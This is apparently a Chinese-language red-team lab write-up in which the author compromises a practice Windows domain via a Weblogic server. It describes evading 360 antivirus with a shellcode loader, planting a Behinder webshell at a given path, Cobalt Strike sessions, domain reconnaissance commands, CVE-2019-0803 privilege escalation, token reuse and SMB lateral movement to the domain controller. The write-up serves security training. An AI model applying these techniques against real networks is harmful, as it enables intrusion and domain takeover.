ATT&CK实战系列——红队实战（二）

网络配置

网卡：

WEB：

PC：

DC：

	IP
WEB	10.10.10.80（内）/192.168.111.80（外）
PC	10.10.10.201（内）/192.168.111.201（外）
DC	10.10.10.10
物理机	192.168.111.1

启动Weblogic

正常启动，并且可以访问

外网打点

这里因为要下班了，所以直接全自动工具（脚本小子只会工具）

445端口，有SMB可能存在永恒之蓝

139端口，有Samba服务，可能存在爆破、未授权访问、RCE等等

1433端口，有mssql服务，可能存在爆破、注入等等

3389端口、有RDP

7001端口，有Weblogic，可能存在反序列化、SSRF等等

Weblogic扫描结果：

存在几个洞，这里使用集成工具

制作免杀

因为我们事先知道有360，所以现在制作免杀

GitHub找一个（我还不会免杀）

这里尝试https://github.com/HZzz2/go-shellcode-loader

我这里下载并解压后，把文件夹加为了白名单，因为制作过程中老被查杀

微软你真可爱

微软把我的笔记删了

制作的免杀传上去软件不兼容，尝试冰蝎马

把冰蝎的默认马传到C:\Oracle\Middleware\wlserver_10.3\server\lib\consoleapp\webapp\framework\skins\wlsconsole\images目录，然后通过url：http://192.168.111.80:7001/console/framework/skins/wlsconsole/images/shell.jsp访问

找这个web目录我找了好久，有没有大哥告诉我如何找这种java的网站根目录啊

虚拟机不出网，我在kali上启动了CS服务器

搞了半天，免杀的马用不了

直接生成然后通过冰蝎上传即可

内网渗透

常规的down密码

看到密码

shell whoami

这里搜集域内信息

内网信息搜集

systeminfo

主机名: WEB

OS 名称: Microsoft Windows Server 2008 R2 Standard

OS 版本: 6.1.7601 Service Pack 1 Build 7601

OS 制造商: Microsoft Corporation

OS 配置: 成员服务器

OS 构件类型: Multiprocessor Free

注册的所有人: Windows 用户

注册的组织:

产品 ID: 00477-001-0000421-84103

初始安装日期: 2019/9/8, 19:01:04

系统启动时间: 2023/2/20, 14:07:50

系统制造商: VMware, Inc.

系统型号: VMware Virtual Platform

系统类型: x64-based PC

处理器: 安装了 1 个处理器。

[01]: Intel64 Family 6 Model 154 Stepping 3 GenuineIntel ~2918 Mhz

BIOS 版本: Phoenix Technologies LTD 6.00, 2020/11/12

Windows 目录: C:\Windows

系统目录: C:\Windows\system32

启动设备: \Device\HarddiskVolume1

系统区域设置: zh-cn;中文(中国)

输入法区域设置: zh-cn;中文(中国)

时区: (UTC+08:00)北京，重庆，香港特别行政区，乌鲁木齐

物理内存总量: 2,047 MB

可用的物理内存: 1,002 MB

虚拟内存: 最大值: 4,095 MB

虚拟内存: 可用: 2,726 MB

虚拟内存: 使用中: 1,369 MB

页面文件位置: C:\pagefile.sys

域: de1ay.com

登录服务器: 暂缺

修补程序: 安装了 3 个修补程序。

[01]: KB2999226

[02]: KB958488

[03]: KB976902

网卡: 安装了 2 个 NIC。

[01]: Intel® PRO/1000 MT Network Connection

连接名: 本地连接

启用 DHCP: 否

IP 地址

[01]: 192.168.111.80

[02]: fe80::9d91:1b3b:c753:4d51

[02]: Intel® PRO/1000 MT Network Connection

连接名: 本地连接 2

启用 DHCP: 否

IP 地址

[01]: 10.10.10.80

[02]: fe80::f10b:3bc4:f0e4:42d4

net user

net localgroup administrators

net config workstation

shell net view /domain

shell net time /domain

shell net user /domain

怪怪的，先提权吧

使用CVE-2019-0803，去k8那里下载，然后用那个程序运行马即可

找域控

一般时间服务器、DNS服务器就是域控

这里找到10.10.10.10

查看一下域控

shell net group "domain controllers" /domain

草，为什么

能ping通

可能环境没配好

这波我的，我没用system的会话去执行命令

这里生成凭证，连接域控，然后反弹

首先移除令牌

rev2self

通过之前获得的DC 管理的token生成新的凭证

接下来就SMB横向了

域控上线